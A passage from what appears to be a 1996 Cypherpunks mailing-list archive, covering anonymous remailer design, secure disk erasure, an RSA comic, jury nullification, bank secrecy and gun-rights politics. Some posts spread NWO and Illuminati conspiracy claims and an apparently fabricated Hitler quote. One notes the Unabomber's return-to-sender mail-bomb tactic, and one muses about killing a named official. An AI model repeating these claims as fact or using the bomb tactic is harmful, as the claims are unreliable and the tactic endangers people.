blatant statement that our government ("of and for the people") has every intention of fully controlling the content of * everything * we see. The five media conglomes already toe the line in the interests of the NWO. What the NWO failed to consider in their plans was the explosion of the net, and * free * information --the inability of the ruling order to control the news, and stifle mass market criticism before it becomes a topic of general discussion. Bubba's mouthpiece uttered the classic incompetent government under attack mentality response to the problem: "...hey, joe criminal uses sophisticated computer encryption to plot his crimes. why must we be subject to criminals? let's ban all communication [we can not control]...." the suggestion that if commerce was permitted secure cryptography, secure servers, and able to develop its own safety net, the incentive would then not be worth the cost of the mob cracking the codes (they would be reduced back to the usual reliance on an inside job which, will be harder and harder with better security) No, but that solution does not serve the purpose of statist governments controlling * everything * personally, I am even more pessimistic than that: America is being destroyed by the actions of our leaders and their puppet-meisters: 1. the rewriting of educational textbooks by grant dependent university professors. 2. the rewrite of history to reflect not only the politically correct views, but to reflect history as the elite wish to see it --even to the point of rewriting quotations of Thomas Jefferson to suit their purpose. 3. the destruction of the means of investment by permitting an "unregulated" economy built on the greed of a elitist "core" of stock brokers who block consumer actions until their own manipulations have set the pace for their own gains. 4. the destruction a solvent government by the debt-based economy of the Federal Reserve Bank which is not even owned by the central government. 5. the destruction of the educational system by reverting to education by the lowest common denominator. how can young adults who graduate from high school with an education which leaves them functionally literate enough to take a driver's license and mathematically skill only well enough to balance a check book be consider "educated, well-informed" citizens? 6. the destruction of any work-incentive by the establishment of a welfare society. the message today is that it is "socially acceptable" to accept the dole; in fact, it is preferable to demeaning oneself with entry-level work. Is it any wonder why the U.S. has dropped below #20 in the educational sweepsteaks of "Western" culture. The result is a population base which is Joe-Six-Pack * at best, * functional to the point of being able to turn on a TV for 18 hours a day --the average viewing time of the American public is now 7.2 hours * per day, * according to one recent report. Another reports states that the average 6 year old today has seen >2,000 murders... is there any question why there is no value on life? bubba is acting with "fear" as his motto. Dole wants to literately wipe out drugs, even to the point of putting a soldier on every street corner. are we down to this? 1935 will go down in history! For the first time a civilized nation has full gun registration! Our streets will be safer, our police more efficient, and the world will follow our lead in the future! --Adolf Hitler 46. The U.S. government declares a ban on the possession, sale, transportation, and transfer of all non-sporting firearms. ...Consider the following statement: I would fire upon U.S. citizens who refuse or resist confiscation of firearms banned by the U.S. government. --The USMC 29 Palms Combat Arms Survey The survey was given to virtually all special combat units of the Marine Corps (including my son), USArmy special units, Navy Seals, &c. depending on which survey, there were 42 to 54 questions; the government told the men that the major giving the "quiz" was doing a master's paper, or some such poppycock. The government's intent is clear, the above is how they intend to enforce it, and either we stop it now, or there will be no stopping it. guns are a part of it since it denies the ability of "We, the people..." to take offensive action against the government with even reasonable _personal_ firepower --never mind the sophistication of the government arsenal. The only thing in the peoples' favour is that guerilla warfare is extremely difficult to deal with. Why has it gone this far? because Joe-Six-Pack will sell all his freedom in return for the promised security. whose is the Judas goat? the captive press. there is no need to subscribe to conspiracy theories --there are enough facts of the table that conspiracies are irrelevant. but, the statement that a "wired world will 'diminish national sovereignty' is absolutely true --governments might just be fully accountable. one of the few things we all share: the utter, corrosive contempt for our elected officials. =------- Forwarded Message Follows from Edupage of 10 Sep ------- =WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY" =A leading Clinton Administration official on information security and =cryptography matters says that traditional notions of sovereignty, =national security and warfare will be undermined by the year 2020, =when the whole world is "wired" and e-cash is the norm. The result =will be less powerful governments in relation to criminal =organizations such as the Mafia and international drug cartels, says =Michael Nelson, who adds that organized crime members are already =some of the most sophisticated users of computer systems and strong =encryption technology. In addition, computer crackers will pose a =more significant threat. In response, Nelson advocates resolving the =issue of whether unauthorized access of a computer is an "act of =trespass" or an "act of war," and prosecuting the intrusions =accordingly. (BNA Daily Report for Executives 6 Sep 96 A14) = (Courtesy of Edupage) From JonWienk at ix.netcom.com Thu Sep 12 01:18:39 1996 From: JonWienk at ix.netcom.com (JonWienk at ix.netcom.com) Date: Thu, 12 Sep 1996 16:18:39 +0800 Subject: strengthening remailer protocols In-Reply-To: <9609101751.AA00594@ch1d157nwk> Message-ID: <199609120618.XAA27372@dfw-ix12.ix.netcom.com> On Tue, 10 Sep 96, Andrew Loewenstern wrote: >Wei Dai writes: >> How about a combination of the two? Suppose Alice wants to >> anonymously post a message and get replies. She generates a >> new RSA key, signs her post with it, and asks readers to send >> encrypted replies to a server. Then periodicly she sends a >> one-time reply block to the server to retrieve the accumulated >> replies. > >I'd like to chime in and say that this is a really good idea. Basically a >nymserver that holds onto incoming mail until an e-mail arrives from the nym >to retrieve it. Instead of that, how about this? 1. Create a pool of N remailers, each with its own set of public/private key pairs. The public key(s) for each remailer are widely disseminated. Each remailer also publishes a list of other remailers that it will poll for messages. (More about this later.) 2. Each remailer user MUST have at least 1 public/private key pair per nym. The public key should be widely available. 3. Each message is encrypted with the intended recipient's (nym's) public key, and then with each remailer's public key succesively, but in reverse order. (The message is encrypted last with the public key of the first remailer in the chain.) The chain is determined by selecting some subset of N at random, with the set growing as the need for security increases. Encryption is done a la PGP, with a header prepended to the message containing the fingerprint of the public key used to encrypt the session key used to encrypt the actual message. Each layer of encryption encrypts the header of the previous layer of encryption as well as the message, so only the last encryption is "visible", and it is not feasible to detect the number of encryptions by examining the message. 4. The multiply-encrypted message is sent to the first remailer in the chain. The remailer decrypts the message with its private key, and at this point one of two things can happen. If the decrypted message specifies an email address, the remailer sends the message to the specified address. Otherwise, it posts it in a publicly available database with 3 fields. 2 are public; one contains the key fingerprint of the outermost public encryption key, and the other contains the message itself. The third, private field contains the date/time the record was added to the database. Any appropriate techniques for reducing input/output correlation can be used, such as delaying the decryption for random time intervals, dummy messages between remailers, etc. Remailer-to remailer traffic (or to any nym that gets a lot of traffic) should should be bundled together (take a few hours worth of traffic going to a specific nym, ZIP it into one large message, and re-encrypt using that nym's public key) to prevent a sender from being able to recognize any of his messages in transit. 5. Anyone can do lookups in the public fields of the message database by key fingerprint. Remailer users do this to download their messages, and remailers download messages from other remailers in this manner as well. Anyone can download any message in the database; only the intended recipient will be able to decrypt it. Messages are not deleted when they are downloaded; instead they are kept for a fixed period of time (determined by the remailer operator) and then deleted. If users are required to download other people's messages, tracing a message to one specific person will be much more difficult. 6. Steps 4 and 5 are repeated until the final recipient receives his message and decrypts it, at which time crypto-anarchic utopia can resume. Randumb Thotz: Given an encryption program with a database of which remailers poll other remailers, remailer chaining can be automated, and be done randomly. If 2 nyms can agree to poll a mutually known set of remailers, (such as via anonymous Usenet/Blacknet postings) 2-way anonymous correspondence can occur without either nym having to know the other nym's email address. The remailer operators wouldn't know either, but they may be able to make reasonably informed guesses at recipient-nym relationships via analysis of database browsing patterns. This is the the weakest part of the proposal, and suggestions for preventing this would be appreciated. Remailers should use SSL or other encrypted communication protocols to ensure that third parties cannot observe who is browsing what in the public message databases. Jonathan Wienke From frantz at netcom.com Thu Sep 12 01:19:23 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 12 Sep 1996 16:19:23 +0800 Subject: Erasing Disks Message-ID: <199609120609.XAA05442@netcom8.netcom.com> I was asked of an outline of Peter Gutmann's paper, "Secure Deletion of Data from Magnetic and Solid-State Memory" in The Sixth USENIX Security Symposium Proceedings in private mail. Since I think the question is of general interest I am posting the answer and Bccing the original questioner. The paper starts with the comment that most secure data destruction guides are classified. There is the suspicion that the unclassified ones do not cover the newer recording materials and techniques, and will not protect you against government attackers. The analysis techniques for disks examined were Magnetic Force Microscopy (MFM) and its close cousin, Magnetic Force Scanning Tunneling Microscopy (STM). "It is possible to build a reasonably capable SPM for about US$1400, using a PC as a controller." (See http://www.skypoint.com/~members/jrice/STMWebPage.html) This cost is conceivably within the range of a high school student. Peter discusses the way that data can be recovered from under new data (due to the difference in the magnetic domains depending on whether the bits were the same or different), and beside new data due to positioning errors of the head. When trying to develop a secure erasure technique, you need to know the encoding technique used on the disk. (e.g. FM, MFM, RLL, PRML etc.) He recommends a 35 pass erasure scheme as follows: 1-4 Random 5 0x55 6 0xAA 7 0x924924 8 0x492492 9 0x249249 10 0x00 11 0x11 12 0x22 13 0x33 14 0x44 15 0x55 16 0x66 17 0x77 18 0x88 19 0x99 20 0xAA 21 0xBB 22 0xCC 23 0xDD 24 0xEE 25 0xFF 26 0x924924 27 0x492492 28 0x249249 29 0x6DB6DB 30 0xB6DB6D 31 0xDB6DB6 32-35 Random He recommends using cryptographically random numbers and randomly permuting the deterministic passes to further confuse attackers. He warns about disabling any disk caches which may be present, and discusses the problems of erasing data on now-bad sectors. He points out that data which has been left for a long time is harder to erase than recently written data. He mentions that the most powerful commercially available deguassers aren't powerful enough to erase modern disks or DAT tapes. (N.B. Deguassing a disk will also erase the factory-written control tracks, making the disk useless.) He notes that ECC may make destruction of data more difficult. He recommends burning floppy disks. He also discusses recovering data from DRAM and SRAM devices. He mentions that data which has been stored in DRAM for 10 minutes will be detectable after power is removed. He recommends that sensitive data (such as crypto keys) have their bits flipped every second or so. This technique has the beneficial side effect that the page remains recently used and is less likely to be paged out.\ I quote from his conclusion, "Data overwritten once or twice may be recovered by subtracting what is expected to be read from a storage location from what is actually read. Data which is overwritten an arbitrarily large number of times can still be recovered provided that the new data isn't written to the same location as the original data (for magnetic media), or that the recovery attempt is carried out fairly soon after the new data was written (for RAM). For this reason it is effectively impossible to sanitize storage locations by simple overwriting them, no matter how many overwrite passes are made or what data patterns are written. However by using the relatively simple methods presented in this paper the task of an attacker can be made significantly more difficult, if no prohibitively expensive." ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From JonWienk at ix.netcom.com Thu Sep 12 01:20:01 1996 From: JonWienk at ix.netcom.com (JonWienk at ix.netcom.com) Date: Thu, 12 Sep 1996 16:20:01 +0800 Subject: 16oz packages In-Reply-To: Message-ID: <199609120618.XAA19460@dfw-ix9.ix.netcom.com> The Unabomber used his intended victim's address for the return address on several if his mail bombs, and then used insufficient postage on them to ensure that they would be "returned to sender." It would seem that the same tactic could be used now, if packages over 16oz are "sent back." How are we any safer now? From scrappo.reverb at juno.com Thu Sep 12 03:02:41 1996 From: scrappo.reverb at juno.com (A L) Date: Thu, 12 Sep 1996 18:02:41 +0800 Subject: An old _Discover_ article explaining RSA Message-ID: <19960911.212157.4415.0.scrappo.reverb@juno.com> I had found this article in an issue of Discover I've had for a few years. It is a comic strip-type article by Larry Gonick article explaining, in Layman's terms, the very basics of RSA. This article was printed in the April 1992 issue of Discover magazine (some liberties taken regarding pictures, etc.). Box1:Prime Time featuring SEYMOUR Cloak-and-Dagger Mathematician! (sh!) Box2:PRIME NUMBERS-numbers that can't be broken into a product of smaller factors- have always been one of the most amusing and USELESS topics in mathematics. Box3:Then why are Banks, Businesses, Mathematicians, and Government SPY AGENCIES fighting over prime numbers? (STOP RIGHT THERE!) Box4:It has to do with CRYPTOGRAPHY-secret codes. (The patriotic thing to do would be NOT to read one more word!) Box5:In the computer age, cryptography is MATHEMATICAL: Inside the computer, every MESSAGE is a string of ONES and ZEROES: a number, in other words. (PLEASE!!!) Box6:ENCRYPTING a message means scrambling this number, using a reversible formula based on a secret number or numbers called the KEY. message-->key-->cyphertext DECRYPTING the cyphertext is done by applying the key in reverse. Box7:It would seem that both the sender and receiver need to know- and conceal-the key, but in the 1970's, WHITFIELD DIFFIE and MARTIN HELLMAN showed a way to MAKE KEYS PUBLIC! (Hippy-Diffie!) Box8:Knowing how to SCRAMBLE, said Diffie, is not the same as knowing how to UNSCRAMBLE. Consider the egg!!! Box9:Suppose a code had TWO KEYS, a scrambler and an UNSCRAMBLER... and suppose it was IMPOSSIBLE to compute one key from the other-in the sense that no computer could do it in less than the lifetime of the UNIVERSE??? (crank crank crank) Box10:You'd have an UNBREAKABLE CODE! (Wait... Almost got it...) Box11:It works like this: Everyone owns a unique pair of keys. One remains private. But the other, public key is listed in a directory. To send me a message, you look up my public key and use it to scramble the message. My private key is the only way to unlock the message. Result:total secrecy and privacy!! Box12:Diffie's idea soon became a reality, as three guys at M.I.T. created a public-key algorithm known as RSA, from their initials. (picture)Rivest (picture)Shamir (picture)Adleman Box13:RSA's unbreakability depends on the "impossibility" of FACTORING large numbers. (15? that's 3 x 5! Easy!) (3,447,981,101,346,271,113,552,476,003,201, 119,181,244,551,900,123,549,822,344,722,436,001? um..) Box14:It's not hard to find two large PRIME NUMBERS P and Q. But if I hand you their PRODUCT, PQ, your supercomputer will never find P and Q again. (SOB!) Box15:Under RSA, each user gets a 160 digit number, N, which is the product of two large primes, P and Q. Box16:The number N is made public, while P and Q remain secret. A simple formula completes the encryption, which can't be cracked without FACTORING! (ngh) Box17:The National Security Agency didn't like this! The spy bureau wants the ability to crack any code! (Your assignment Seymour: FACTOR FASTER!!) Box18:But spies aren't the only ones who need cryptography! Anyone who transmits ELECTRONIC DATA wants to secure the information's integrity. (Why? What? This is an OPEN SOCIETY!) Box19:Unbreakable public-key code would effectively Protect money transfers from tampering Shield sensitive business data from the competition Immunize software against viruses (Allow us to gossip securely by E-Mail!) Box20:So-After years of resisting Public-Key systems, the government in 1991 finally endorsed one as a new NATIONAL STANDARD. (I WAS WRONG! EMBRACE ME!) Box21:Unlike RSA, however, the government's DSA (Digital Signature Algorithm) depends on a single, government-issue PRIME NUMBER. (Take a P! Not any P!) Box22:Within months, mathematicians had shown how this could give the government, and the government alone, the ability to BREAK the code-and so the argument continues... (Trust, Where is the trust??) From gbroiles at netbox.com Thu Sep 12 03:25:35 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Thu, 12 Sep 1996 18:25:35 +0800 Subject: jury nullification/selection Message-ID: <2.2.32.19960912075929.00691470@pop.ricochet.net> Sorry if I was too terse earlier. I hadn't intended to start a big FIJA dustup. I think that government sleaziness is not only useful in a true nullification argument ("he's guilty but you should acquit anyway") but where it reflects on the credibility of testimony and the prosecution's case in general. It's easy to imagine a prosecution which rests on the testimony of people who lie every day (criminally involved informants, jailhouse informants, and undercover cops) and/or real evidence which was gained through the use of subterfuge and trickery (like wiretap/body wire evidence). The idea is to make the government look sleazier and trickier than the defendant(s) and the defense witnesses. If the government's evidence ends up being tainted directly or indirectly by lying, trickery, etc., then the defense can argue "Hey. You can't trust anyone who got up on that stand and talked to you. And if you don't know who to trust and you think everyone's lying, the government's got no case. And if they've got no case, the judge will tell you that you must acquit." So I think that public distaste and discomfort with weirder and sleazier tactics on the part of cops can be (and is) discussed and used and "voted on". "Not guilty" doesn't necessarily mean "innocent", sometimes it means "The prosecution didn't have enough evidence I thought I could trust." And yes, I agree that even mentioning nullification during voir dire will probably get you kicked off of a jury; and I think that's partly because one party or the other will be scared of nullification, and partly because the term "jury nullification" makes people think of FIJA and associated loons. Nobody wants a loon on the jury. (I don't think everyone who argues for nullification is a loon, but some of them sure are - and there's no good way to figure out whether someone's a loon or not in the middle of jury selection.) And I also agree that the jury selection process tends to select away from a true cross-section of society; but the few easily available examples (big trials like OJ or the Menendez Bros. or Wm. Kennedy Smith or whoever) are poor examples because they're not typical. Trials where lots is at stake (death penalty or celebrity defendant or big $ civil trials) tend to have longer processes (which weed out everyone who isn't incredibly boring) but it's not at all uncommon to pick a jury in a morning or in a day or two. In federal court, the judge usually questions the jury instead of the attorneys (which is faster), and may or may not ask questions that the attorneys have suggested. Also, sometimes one side or the other will *want* especially analytical or technical or well-trained jurors. Attorneys want to pick a jury they can persuade, but they also want to pick a jury that can understand their theory of the case. So I guess my point is that while the jury system isn't perfect, it is in some ways a much more direct way to "vote" on how things work in the judicial and law enforcement systems. I think it's more immediately and directly democratic than the electoral system. All of the legal bullshit aside, it's possible to think about trials as a way for people who have some sort of problem (they've been injured or accused of a crime or whatever) to tell a group of uninvolved people about the problem and ask them what the right thing to do is. Yeah, that's really oversimplified, but I think that what juries do is important and that what they do has a political and a moral dimension even if attorneys aren't supposed to talk about it during argument. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From amnesia at chardos.connix.com Thu Sep 12 03:32:25 1996 From: amnesia at chardos.connix.com (Anonymous) Date: Thu, 12 Sep 1996 18:32:25 +0800 Subject: Child porn as thoughtcrime Message-ID: <199609120442.AAA27448@chardos.connix.com> Chuck Thompson writes: > > Well Andrew, pornography is meant to lead to arousal, which can lead to > aggression, which may lead to abuse. It's a fairly common path according to > what I've read on deviancy. Going into a bank can lead to casing out the joint, which may lead to a heist. Should this make the posession of pictures of banks illegal? I don't think that anyone here is advocating kiddie porn. The problem that TCM pointed out is that in fighting kiddie porn, legislators have started banning _thoughts_ that _could_ lead to child abuse. This is one great leap forward into the police state. > Following is one association's opinion, but > don't stop there, read for yourself what some of the deviants themselves > have to say: You're seeing the trees and missing the forest. It could be any activity, say the abuse of animals, that winds up being used as a wedge to create the police state. If the government started tatooing red 'P's on the foreheads of convicted pedophiles, would anyone notice the irony? Bobo From schmidt at pin.de Thu Sep 12 03:37:05 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Thu, 12 Sep 1996 18:37:05 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: <32371250.3F54BC7E@systemics.com> Message-ID: > > ... but the semi automatics they carry are not much different to ones US > cops have. I thought the US cops also use H&K MP5 or such things. The same as in Germany :) > And *they'll* decide what sort of deal *they* want to offer. They did > say the money could be donataed to any non-profit organisation, so this > covers a wide range of organisations (your school or university perhaps, > or computer society, or even the Church of Scientology, The Vatican, > Mitre Corp, NFL, etc. etc.). I wonder if Radikal is a non-profit :-) Taken in account that they are leftist, they should be non-profit ;) -stephan From paul at fatmans.demon.co.uk Thu Sep 12 06:31:18 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 12 Sep 1996 21:31:18 +0800 Subject: Ban CU Secrecy, Keep TLA's! Message-ID: <842468796.562.0@fatmans.demon.co.uk> > > Mr David Bickford, the first British intelligence lawyer > to speak publicly in the UK, said at a conference in > Cambridge, 50 miles north-east of London, that there > "appears to be no justification at all for offshore bank > secrecy other than to protect the criminal". Apart from tehe confidentiality of the customer, bank, all those they trade with and all other interested parties, well then, they can`t be that important can they > > He said "offshore bank secrecy can and must be abolished" > and "the UK should be the first to abolish this secrecy > given their control of their dependent territory offshore > centres". So because we choose to maintain a statist and totalitarian empire we had better set an example of how to do it to the rest of the world??? > > Mr Bickford, who now runs an international legal > consultancy, said "endemic corruption" is caused by > offshore secrecy, and it is "difficult to see why it is > tolerated by any other than those with an unlawful > disposition". It is also diffult to see why I don`t go round to mr. Bickfords house and kill him, his dog, and his pet hamster, but I don`t, nor do I intend to, to say that we cannot see a reason for people wanting privacy is no justification for legislation that prohibits such privacy. > He said allowing countries to maintain offshore banking > secrecy is "a classic example of the corruptive influence > of organised crime". It is a classic example of privacy and freedom in a free society (not that I believe Britain falls into this category) Has anyone got this guys IQ, it`s probably the first ever negative IQ in the history of the world, cheer everyone, its a historic find. Mr. Bickford, I believe you to be a fuckwit, feel free to prove me wrong.. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From perry at alpha.jpunix.com Thu Sep 12 07:17:27 1996 From: perry at alpha.jpunix.com (John Perry) Date: Thu, 12 Sep 1996 22:17:27 +0800 Subject: New type2.list/pubring.mix Message-ID: <199609121101.GAA18549@alpha.jpunix.com> I just updated the type2.list/pubring.mix combination on jpunix.com to reflect the disappearance of the ncognito remailer. I've been getting nothing but bounces and the owner doesn't seem to be around to fix it. The updated lists can be obtained by WWW from www.jpunix.com and by anonymous FTP from ftp.jpunix.com. -- John Perry KG5RG perry at alpha.jpunix.com PGP-encrypted e-mail welcome! WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. From adam at homeport.org Thu Sep 12 09:27:45 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 13 Sep 1996 00:27:45 +0800 Subject: What is best policy paper on crypto? In-Reply-To: Message-ID: <199609121242.HAA05004@homeport.org> Declan McCullagh wrote: | I happen to know that an influential Congresspern will be meeting with | some Cato folks tomorrow morning, so I'm assuming this isn't an idle | request. | | -Declan The NAS report, despite a few silly points, does push for liberalization of the export regime, standardization, a switch to an 'assume export' stance, states that the debate can be carried out in public, and that classified information is not needed, and suggests that crypto can help reduce many threats to Americans. It does not suggest abolishing the ITARs, and suggests consideration of a law criminalizing the criminal use of crypto. It is a balanced report, and has NSA, and attorney generals on it. Otherwise, I'd go with some of Whit's testimony before Congress. (Saw a presentation by Herb Lin yesterday at MIT.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From julf at penet.fi Thu Sep 12 10:03:58 1996 From: julf at penet.fi (Johan Helsingius) Date: Fri, 13 Sep 1996 01:03:58 +0800 Subject: na673130@anon.penet.fi gone [Anonymous service rejected your mail.] (fwd) Message-ID: <1.5.4.32.19960912122408.0073d650@pentu.penet.fi> At 21:49 96/09/11 -0400, Andy Dustman wrote: >Looks like Spambo either deleted his id or Julf pulled the plug on him. I pulled his plug. But his real address has been on this list several times. Julf From jseiger at cdt.org Thu Sep 12 11:44:24 1996 From: jseiger at cdt.org (Jonah Seiger) Date: Fri, 13 Sep 1996 02:44:24 +0800 Subject: Sen. Burns' statement on postponement of Crypto vote today. Message-ID: As you may have heard by now, the Senate commerce committee markup of the Burns/Leahy "Pro-CODE' bill, originally set for today, has been postponed. Indications from the Commerce Committee staff are that this was largely due to scheduling issues, although end-of-the-session politics are also playing a role. Both the Committee staff and Senator Burns himself (see note below) have said they are committed to holding a markup before the end of the session. We expect more information early next week and will post updates as soon as new information becomes available. Senator Burns asked us to forward the following note to the net.community: >X-POP3-Rcpt: jseiger at mailserver >From: Conrad_Burns at burns.senate.gov >Date: Thu, 12 Sep 96 09:55:35 EST >To: jseiger at cdt.org >Subject: Open Letter to the Internet from Senator Burns > > The Commerce Committee markup on Pro-CODE, S. 1726, that we had > expected to have held on Thursday, September 12 has been postponed. I > am fully committed to taking Pro-CODE to markup, out of committee and > onto the floor of the Senate in this Congress. I believe that this > legislation is vital to ensuring the continued strength of America's > high-tech community and the privacy of its citizens. I would like to > thank the many thousands of Netizens who have expressed their support > for Pro-CODE. > > Sincerely, > > U.S. Senator Conrad Burns > Please keep your phone calls coming to the Senate Commerce Committee members offices, and be sure to sign the petition at http://www.crypto.com/petition/. A coalition alert with more information will be posted soon. Jonah ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT ** It's not too late to be a part of history -- Join the Lawsuit -- -- Jonah Seiger, Policy Analyst Center for Democracy and Technology 1634 Eye Street NW, Suite 1100 Washington, DC 20006 PGP Key via finger (v) +1.202.637.9800 http://www.cdt.org/ (f) +1.202.637.0968 http://www.cdt.org/homes/jseiger/ From talon57 at well.com Thu Sep 12 11:59:27 1996 From: talon57 at well.com (Brian D Williams) Date: Fri, 13 Sep 1996 02:59:27 +0800 Subject: [BOOK] Competitive Intelligence Message-ID: <199609121420.HAA14936@well.com> Competitive Intelligence "From Black Ops to Boardrooms- How Businesses Gather, Analyze, and use Information to Succeed in the Global Marketplace." ISBN 0-684-81074-3 Simon and Schuster ($24.00) Preface: Being a Hero and not a Bum Part One: What is Competitive Intelligence? 1.) The Rise of Competitive Intelligence 2.) What Competitive Intelligence can do for your company: Information vs Intelligence 3.) Why most managers are still stuck in the information age Part Two: Real-World Competitive Intelligence 4.) The Intelligence Cycle 5.) Planning and Direction 6.) Collection 7.) Analysis 8.) Dissemination 9.) Mergers and Acquistions 10.) Benchmarking and Competitive Intelligence 11.) How the Japanese Perform Competitive Intelligence 12.) Competitive Intelligence in other Countries 13.) Building a Competitive Intelligence System Part Three: Issues, Opportunities, and the Future 14.) Justifying the cost of Competitive Intelligence 15.) Using Competitive Intelligence in the European Union 16.) Ethics 17.) The New Gatekeepers 18.) Why the U.S. Government must get involved in Competitive Intelligence 19.) Competitive Intelligence-The Next Generation Glossary of Competitive Intelligence From cme at cybercash.com Thu Sep 12 12:20:38 1996 From: cme at cybercash.com (Carl Ellison) Date: Fri, 13 Sep 1996 03:20:38 +0800 Subject: ISODE Consortium X.509 Certification system Message-ID: <3.0b11.32.19960912105914.0054f7b0@cybercash.com> Bill, thanks for forwarding this to me. It really bothers me whenever I see someone mouthing plattitudes about certificates, like: >The ITU-T, through X.509, recommend strong authentication based on public >key cryptosystems as the basis for providing secure services. The ISODE >Consortium uses X.509 as the core of its security strategy. >X.509 provides a flexible, scaleable and manageable algorithm-independent >authentication infrastructure, which can be used as the basis for a wide >range of security services such as message encryption and access control. Fact is, identity certification (which is what X.509 gives) is neither necessary nor sufficient for providing secure services -- and there's nothing magic about X.509. There are marketeers, however, who want the world to believe that the generation and use of X.509 certs will somehow give you security -- so they can sell machinery or a service which makes those certs. - Carl P.S. My USENIX paper giving the case against certification authorities is on-line now at = +------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | | PGP 2.6.2: 61 E2 DE 7F CB 9D 79 84 E9 C8 04 8B A6 32 21 A2 | +-Officer, officer, arrest that man. He's whistling a dirty song.--+ From attila at primenet.com Thu Sep 12 12:26:01 1996 From: attila at primenet.com (attila) Date: Fri, 13 Sep 1996 03:26:01 +0800 Subject: Bubba Bottoming out on Cocaine Paranoia? In-Reply-To: Message-ID: <199609121502.JAA19550@InfoWest.COM> In , on 09/12/96 at 08:16 AM, Chip Mefford said: = > 2. the rewrite of history to reflect not only the = > politically correct views, but to reflect history as = > the elite wish to see it --even to the point of rewriting = > quotations of Thomas Jefferson to suit their purpose. = > = Can you give a clear example of this?? = Just asking the most blatant one was the rewording of Jefferson's words for the equality of all men about two years ago. As we know, Jefferson was all for freedom, and had a "God bless you, you're a slave" attitude, but he was clearly not for the equalization. when that one came out of washington, several papers had a hard time with it, but I have seen it since. I have been collecting Jefferson quotes for years; frankly, I always considered the Dems were off base: Jefferson was the Republican --leaving Hamilton and his Federalists as pawns pawns of the Illuminati as advocates of the independent Federal Bank (the worst of the Rothschilds (Maurice, I think) who made the statements regarding control of the government by control of the money was in his prime around 1800). I am not a dedicated Jeffersonian scholar, but he has been the corner stone of my (now long blown) faith in our government. I would a complete set of Jefferson's works --if, and only, if I could find a good edition published over a 100 years ago. secondly, Jefferson is now interpreted as being the great enfranchiser, which is not even close to his view. Jefferson's writings clearly emphasize that the electorate should be comprised of the landed and merchant class; secondly, it was Jefferson's statement that the electorate, and therefore the juries should be composed "...of a well educated and informed citizenry." Jefferson was interested in an electorate which was of substance and possessing of a stake in America. One of the clear principles of Jeffersonian thought was that jury, beyond the requirement of guilt beyond a reasonable doubt, was to _vote its conscience_. Jefferson was responsible for including the constitutional language which makes this possible, even today, despite instructions from judges who could care less about the intent of the constitution and are treating the accused as nothing more than cattle on the way to the abattoir --if they are not guilty this time they will be next time, so why waste further time --sometimes known as "collateral damage." = > Why has it gone this far? because Joe-Six-Pack will sell = > all his freedom in return for the promised security. who is = > the Judas goat? the captive press. = > = Actually, being a "Joe six pack" my own damn self, I'd have to say = that this is simply not the case. It is Joe six pack who makes up the = body of the NRA and most other freedom watch dog organizations. = Just for yer information, the pendulem has been swinging very much = the other way, with 36 or 37 states recently following Floridas lead = on concealed weapons carries. Not only that, but even NPR has even = admitted that it has been effective. Agreed on the restoration of concealed weapons rights which had been regulated out of existence. Granted, Joe-Six-Pack may not be the perfect analogy, but I refer to America's working class, blue collar and the grunts of the white collars as Joe-Six-Pack --maybe I should say Joe-Couch-Potato. the class" referenced is a collection of many levels --what they have in common is they work and then confrom to the current norm of 7.2 hrs/day in front of the tube which becomes their entire source of information --THEY will sell out from ignorance. If you refer to Joe-Six-Pack as the the classic Southern red neck, any attempt to limit their freedom, particularly the right to a pickup truck with a gun rack, and their handguns --that's a very different situation. and that extends to small town westerners, like myself, and to the plains. I grew up on a farm, went to Harvard, joined the spooks for six years of a bloodpath, bounced around the world in different fields, and I am back in a very small community in the high desert: 100 families. Noone around here questions my bad attitude --the admissions requirements are at least 5 kids and 2000 rounds. However, I think Joe-Six-Pack, in this constrained social set, for the vast majority would sell out on freedom of cryptography. they do not understand it, particularly against the onslaught of the pinko-liberal captive media. Our job is to educate them --and not with defiant rhetoric (such as mine). As for concealed weapons permits, bank robberies should certainly drop --all it would take is one cowboy (and I'll volunteer) and anything other than a large coordinated operation is in serious trouble. One unsuspected, mean and surly patron with a .357 who seriously knows how and when to use same is very effective. On the other hand, I do not recommend carrying an assault rifle on a sling over your shoulder to visit the bank.... The simple (I think) point I was trying to make was: the vast majority of our U.S. citizens would acquiesce to the deployment of federal troops in return for security, rather than being armed, Posse Comitas not withstanding, to wipe crime off the streets. The point could even be made: the troops might as well be doing something useful rather than sitting around their bases; we do have a rather large standing army --unfortunately, they would become poorly trained and poorly disciplined --and could easily be part of the massive corruption in our cities (and every other government over many people). Frankly, we should all vote in a _free_ cyberspace; forget the current system of choosing party loyalists and presidential electors. The application of a military mentality on the streets is not my idea of law and order --they could kill off the majority of the crime by legalizing all drugs and dispensing them in clinics. Britain reduced their second story (burglary) crime rate by over 60%; they did find they had a great many more addicts than the thought, however. A second benefit is that it takes some of the mystery and challenge out of drugs --however, be prepared for the alcohol problem, although that effect would be significantly less than the current social 